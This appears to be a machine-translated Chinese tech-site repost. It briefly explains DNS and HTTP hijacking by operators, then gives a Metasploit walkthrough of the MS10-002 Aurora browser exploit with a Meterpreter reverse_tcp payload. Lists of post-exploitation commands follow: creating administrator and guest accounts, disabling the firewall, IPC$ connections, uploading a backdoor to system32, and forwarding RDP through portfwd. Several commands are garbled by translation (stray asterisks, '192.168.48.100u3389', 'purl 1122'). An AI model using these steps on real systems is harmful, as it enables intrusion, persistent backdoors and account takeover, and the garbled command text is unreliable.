In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
DNS hijacking: the DNS servers where users surf the Internet are assigned by operators, so operators can do whatever they want on this node.
For example, visit a website, enter the domain name, and the normal DNS server returns the IP of the domain name. After DNS hijacking, it will return an intermediary server IP. The access server will consistently return 302, allowing the user's browser to jump to the preprocessed web page with ads, and then open the address that the user originally visited through iframe.
HTTP hijacking:
On the router node of the operator, set up protocol detection, and once it is found that it is a http request and it is a html type request, it will be intercepted and processed. The follow-up methods are often divided into two types, one is DNS hijacking return 302 to make the user's browser jump to another address, and the other is to insert js or dom node ads in the HTML data returned by the server.
Ensure network connectivity and configure network address
Use msfconsole for the first time to open the built-in databases PostgreSQL and metasplote
Enable PostgreSQL: service postgresql start
Enable metasploit: service metasploit start
Root@kali:~ps-e | grep 5432 (make sure that the postgresql service is enabled. The default port occupation is 5432)
Root@kali:~# msfconsole
Find 10-002 vulnerability module search 10-002
Vulnerability in use exploit/windows/browser/ms10_002_aurora *
Set payload windows/meterpreter/reverse_tcp defines * load
Set lhost 192.168.48.123 defines the native address
Set URIPATH / defines the suffix of url (I only set one / here)
Exploit development
Open the target website http://192.168.48.123:8080/ on the * host
Sessions-I 1 Open a connection session
Session views sessions that have been successfully acquired, and meterpreter sessions that connect to specified serial numbers using session-I continue to take advantage of
Get the remote command line of the target host through shell
Create accounts and passwords through DOS
Windows common commands
1. Net localgroup administrators username and password / add (add the user to the administrator to give them administrative privileges)
2. Net user guest / active:yes (activate guest users)
3. Net user guest 12345 (change the guest password to 12345)
4. Net user (view account attributes)
5. Net start (check which services are enabled)
6. Net time\\ Target ip (check the time of the other party)
7. Net view (check which shares are enabled in the local area network)
8. Net share (view those shares enabled locally)
9. Net share C$/del (delete the default share of disk c)
10. Copy xx.exe\\ ip\ admin$\ System32 (copy the current xx.exe to the System32 directory of the other party's Admin$ share)
11. Sc config tlnesvr start= auto (modify the startup mode of telnet service to be automatic, with a space in front of auto)
12. Net stop sharedaccess (turn off the firewall that comes with the system)
13. Net send IP message (send a message to the target IP using messenger service)
14. Tasklist (View process)
15. Taskkill (termination process) ntsd forcibly terminates the process
16. Services.msc enters the service of the local computer
17. Net use\\ ip\ ipc$ "" / user (create an empty IPC link)
18. Net use\\ ip\ ipc$ "password" / user: "user name" (to establish an IPC non-empty connection, a non-empty link means an account and password are required)
19. Net use\\ ip\ ipc$ / del (delete ipc empty connection)
20. Net use z:\\ 127.0.0.1\ c$ (map target host disk c to local disk z)
Connect the system remotely
Rdesktop-u administrator-p 123 192.168.48.100u3389
Getuid to view the user of the process that meterpreter is injected into the target host
Upload commands to upload files to the target host, such as transferring the backdoor program setup.exe to the target host system32 directory
Upload setup.exe C:\\ windows\\ system32\
Portfwd Port Forwardin
For example, 3389 is enabled on the target host, but only specific IP access is allowed. * the host cannot connect. You can use the portfwd command to forward port 3389 of the target host to another port to open.
For example: portfwd add-l 1122-p 3389-r 192.168.48.100
Forward port 3389 of the target host 192.168.48.100 to port 1122
You only need to connect to port 1122 of the target to open the remote desktop.
Rdesktop-u administrator-p 123456 192.168.48.100 purl 1122
Sysinfo views the system information of the target host
Ps looks at the process information running on the target host, using the
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.